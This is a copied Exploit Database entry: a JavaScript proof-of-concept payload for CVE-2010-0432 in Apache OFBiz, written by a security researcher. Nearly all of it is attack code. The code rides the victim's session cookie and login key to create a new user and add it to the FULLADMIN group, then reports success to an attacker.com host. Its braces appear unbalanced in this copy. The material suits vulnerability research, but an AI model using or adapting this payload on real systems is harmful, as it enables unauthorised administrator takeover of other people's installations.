Apache OFBiz – Admin Creator

Exploit Database
103 阅读

作者： Lucas Apa

日期： 2010-04-16
类别：
- remote
平台：
- multiple
来源：https://www.exploit-db.com/exploits/12264/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

Apache OFBiz FULLADMIN Creator PoC Payload.

CVE: CVE-2010-0432

By: Lucas Apa ( lucas -at- bonsai-sec.com ).

Bonsai Information Security

http://www.bonsai-sec.com/

var username = 'bonsaiUser';

var password = 'bonsaiPass';

var nodes = document.getElementsByClassName('fieldWidth300');

for (var i=0; i<nodes.length; i++) {

if(/script/.test(nodes[i].children[0].innerHTML)){

nodes[i].parentNode.style.display = "none";

}

var xmlhttp=false;

try {

xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");

} catch (e) {

try {

xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");

} catch (E) {

xmlhttp = false;

}

if (!xmlhttp && typeof XMLHttpRequest!='undefined') {

try {

xmlhttp = new XMLHttpRequest();

} catch (e) {

xmlhttp=false;

}

if (!xmlhttp && window.createRequest) {

try {

xmlhttp = window.createRequest();

} catch (e) {

xmlhttp=false;

}

xmlhttp.open("GET", "/myportal/control/main",true);

xmlhttp.send(null)

xmlhttp.onreadystatechange=function() {

if (xmlhttp.readyState==4) {

var text = xmlhttp.responseText;

var regex = /externalLoginKey=(.*?)\"/;

var externalKey = text.match(regex)[1];

xmlhttp2 = false;

try {

xmlhttp2 = new ActiveXObject("Msxml2.XMLHTTP");

} catch (e) {

try {

xmlhttp2 = new ActiveXObject("Microsoft.XMLHTTP");

} catch (E) {

xmlhttp2 = false;

}

if (!xmlhttp2 && typeof XMLHttpRequest!='undefined') {

try {

xmlhttp2 = new XMLHttpRequest();

} catch (e) {

xmlhttp2=false;

}

if (!xmlhttp && window.createRequest) {

try {

xmlhttp2 = window.createRequest();

} catch (e) {

xmlhttp2=false;

}

var cookie = unescape(document.cookie);

xmlhttp2.open("POST",

"/webtools/control/scheduleService?externalLoginKey="+externalKey,true);

xmlhttp2.onreadystatechange=function() {

if (xmlhttp2.readyState==4) {

//alert(xmlhttp.responseText)

}

xmlhttp2.setRequestHeader("cookie", cookie);

xmlhttp2.setRequestHeader("content-type",

"application/x-www-form-urlencoded");

var

str1=(<r><![CDATA[POOL_NAME=pool&SERVICE_NAME=createUserLogin&_RUN_SYNC_=Y&currentPassword=]]></r>).toString();

var str2 = (<r><![CDATA[&currentPasswordVerify=]]></r>).toString();

var str3 =

(<r><![CDATA[&enabled=&externalAuthId=&partyId=&passwordHint=&requirePasswordChange=&userLoginId=]]></r>).toString();

var post_data = str1 + password + str2 + password + str3 + username;

xmlhttp2.send(post_data);

var xmlhttp3=false;

try {

xmlhttp3 = new ActiveXObject("Msxml2.XMLHTTP");

} catch (e) {

try {

xmlhttp3 = new ActiveXObject("Microsoft.XMLHTTP");

} catch (E) {

xmlhttp3 = false;

}

if (!xmlhttp3 && typeof XMLHttpRequest!='undefined') {

try {

xmlhttp3 = new XMLHttpRequest();

} catch (e) {

xmlhttp3=false;

}

if (!xmlhttp3 && window.createRequest) {

try {

xmlhttp3 = window.createRequest();

} catch (e) {

xmlhttp3=false;

}

xmlhttp3.open("POST",

"/webtools/control/UpdateGeneric?entityName=UserLoginSecurityGroup&externalLoginKey="+externalKey,true);

xmlhttp3.onreadystatechange=function() {

if (xmlhttp3.readyState==4) {

if(/UserLoginSecurityGroup/.test(xmlhttp3.responseText)){

var xmlhttp4=false;

try {

xmlhttp4 = new ActiveXObject("Msxml2.XMLHTTP");

} catch (e) {

try {

xmlhttp4 = new ActiveXObject("Microsoft.XMLHTTP");

} catch (E) {

xmlhttp4 = false;

}

if (!xmlhttp4 && typeof XMLHttpRequest!='undefined') {

try {

xmlhttp4 = new XMLHttpRequest();

} catch (e) {

xmlhttp4=false;

}

if (!xmlhttp4 && window.createRequest) {

try {

xmlhttp4 = window.createRequest();

} catch (e) {

xmlhttp4=false;

}

xmlhttp4.open("GET", "

http://www.attacker.com/successful-ofbiz-attack.php?done=yes",true);

xmlhttp4.send(null);

}

xmlhttp3.setRequestHeader("cookie",cookie);

xmlhttp3.setRequestHeader("content-type",

"application/x-www-form-urlencoded");

var str1 = (<r><![CDATA[UPDATE_MODE=CREATE&userLoginId=]]></r>).toString();

var str2 =

(<r><![CDATA[&groupId=FULLADMIN&fromDate=2000-02-01+1%3A38%3A44.252&thruDate=2020-02-27+1%3A38%3A49.268&lastUpdatedStamp=2010-02-11+1%3A38%3A56.724&lastUpdatedTxStamp=2010-02-04+1%3A39%3A0.260&createdStamp=2010-02-22+1%3A39%3A2.692&createdTxStamp=2010-02-28+1%3A39%3A6.548&Update=Crear]]></r>).toString();

var post_data2 = str1 + username + str2;

xmlhttp3.send(post_data2);

}